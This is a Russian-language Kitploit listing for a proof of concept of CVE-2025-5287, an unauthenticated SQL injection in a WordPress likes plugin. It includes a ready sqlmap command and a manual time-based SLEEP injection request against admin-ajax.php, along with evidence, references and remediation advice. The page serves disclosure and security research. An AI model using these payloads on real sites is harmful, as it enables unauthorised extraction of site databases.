Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-5287 — Плагин WordPress Likes and Dislikes Plugin <= 1.0.0 уязвим к SQL-инъекции. | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-5287
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-5287

CVE-2025-5287

Плагин WordPress Likes and Dislikes Plugin <= 1.0.0 уязвим к SQL-инъекции.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔥 Плагин WordPress Likes and Dislikes ≤ 1.0.0 — Неаутентифицированная SQL-инъекция

🧠 CVE ID: CVE-2025-5287

Обнаружил: Khaled_Alenazi (Nxploited)   Опубликовано: 27 мая 2025 г.


📋 Описание

Плагин Likes and Dislikes для WordPress уязвим к SQL-инъекциям через параметр post во всех версиях вплоть до 1.0.0 включительно.   Из-за недостаточного экранирования и отсутствия подготовленных выражений неаутентифицированные злоумышленники могут внедрять сырой SQL в серверные запросы, что приводит к утечке или изменению данных.


🧬 Технические детали

  • Уязвимый параметр: post
  • Тип уязвимости: SQL-инъекция (Boolean-based и Time-based)
  • HTTP-метод: POST
  • Затронутый эндпоинт: /wp-admin/admin-ajax.php
  • Статус исправления: ❌ Не исправлено
  • Требуемые привилегии: Нет (без аутентификации)
  • Оценка CVSS: 9.3 (Высокая)
  • OWASP Top 10: A1 — Инъекции

  • 💥 Эксплуатация

    ✅ Команда SQLMap (Time-based Blind SQLi):

    root@kitploit:~
    sqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
    --data "action=my_likes_dislikes_action&post=1&state=like" \
    --method POST --risk 3 --level 5 --batch --time-sec=5 --dbs
    

    Эта команда подтверждает точку инъекции и перечисляет базы данных с помощью time-based техники.

    🧪 POC-Payload (вручную — Time-based):

    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: nxploit.ddev.site
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    
    action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like
    

    🧪 Сводка доказательств

    1. Перечисление с помощью SQLMap:    - Обнаружены boolean-based blind и time-based blind SQLi.    - Подтверждено, что серверная СУБД — MySQL.    - Перечислены базы данных: db, test, information_schema.

       Доказательство SQLMap

    1. Ручная проверка с помощью Burp Suite:    - Задержка HTTP-ответа подтверждена с помощью time-based payload.    - Задержка превысила 15 секунд, что указывает на реальную инъекцию.

       Доказательство Burp Suite


    ⚠️ Риски

    • Серьёзность по CVSS: 9.3 (Высокая)
    • Эта уязвимость может быть использована для извлечения конфиденциальных данных без аутентификации.

    🔗 Ссылки

    • https://patchstack.com/database/wordpress/plugin/inprosysmedia-likes-dislikes-post/vulnerability/wordpress-likes-and-dislikes-plugin-plugin-1-0-0-unauthenticated-sql-injection-vulnerability
    • https://nvd.nist.gov/vuln/detail/CVE-2025-5287

    🛡️ Рекомендации

    • Немедленно очищайте и параметризуйте ввод из post.
    • Используйте prepared statements (подготовленные выражения).
    • Внедрите WAF и rate-limiting (ограничение частоты запросов), чтобы снизить количество попыток подбора при инъекциях.

    ⚠️ Отказ от ответственности

    Данный материал предоставлен только в образовательных и исследовательских целях.   Автор не одобряет вредоносную деятельность или эксплуатацию систем без явного разрешения.


    👤 Автор

    Khaled_Alenazi (Nxploited)

    Скачать инструмент